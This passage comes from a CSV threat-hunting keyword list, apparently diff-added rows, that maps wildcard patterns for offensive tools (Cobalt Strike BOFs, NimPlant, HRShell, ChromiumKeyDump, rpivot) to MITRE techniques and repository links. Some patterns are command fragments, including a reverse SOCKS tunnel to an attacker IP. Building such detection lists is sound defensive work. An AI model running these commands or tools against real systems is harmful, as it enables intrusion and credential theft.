tools","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*chromiumkeydump*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*ChromiumKeyDump.cna*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*ChromiumKeyDump.cpp*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*ChromiumKeyDump.exe*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*Chudry/Xerror*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" +"*chunlie.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*chvancooten/nimbuild*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*chvancooten/NimPlant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*CIMplant.exe *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*CIMplant.sln*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*CIMplant-main*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*cirt-default-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*cirt-fuzzer*","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cisco2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*cisco-phone-query.sh*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*ckiahbcmlmkpfiijecbpflfahoimklke*","greyware_tool_keyword","Gom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*clear_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*clear_command_history.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*ClearEventlog.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*Clearlogs*","signature_keyword","Antivirus Signature","Antivirus signature_keyword for hacktool clearing logs","N/A","N/A","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*clem9669_wordlist_medium.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" 
+"*clem9669_wordlist_small.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*-cli install github *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*-cli install github *Apollo.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*-cli payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*click_to_exploit.docx*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" +"*clickjack_attack.html*","offensive_tool_keyword","beef","BeEF is short for The Browser 
Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickjack_victim.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickme*exploit.html*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" +"*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*client.py --server-ip * --server-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*client.py*--domain*--hashes*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*ClipboardImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboardinject.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboardinject.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboard-monitor *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*ClipboardWindow-Inject*","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","10","10","58","11","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z" +"*clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*cloakify*","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. 
Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","10","1440","233","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z" +"*CloakNDaggerC2-main*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*cloc.exe --exclude-dir*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cloud_enum-master.zip*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*cloudfail.py --target seo.com --tor*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudFilterEOP.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cloudmapper collect --account parent --profile parent*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudmapper configure discover-organization-accounts*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining create-multi-account-config-file -o accounts.yml*","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining download --profile someprofile*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining scan --input-file default.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 
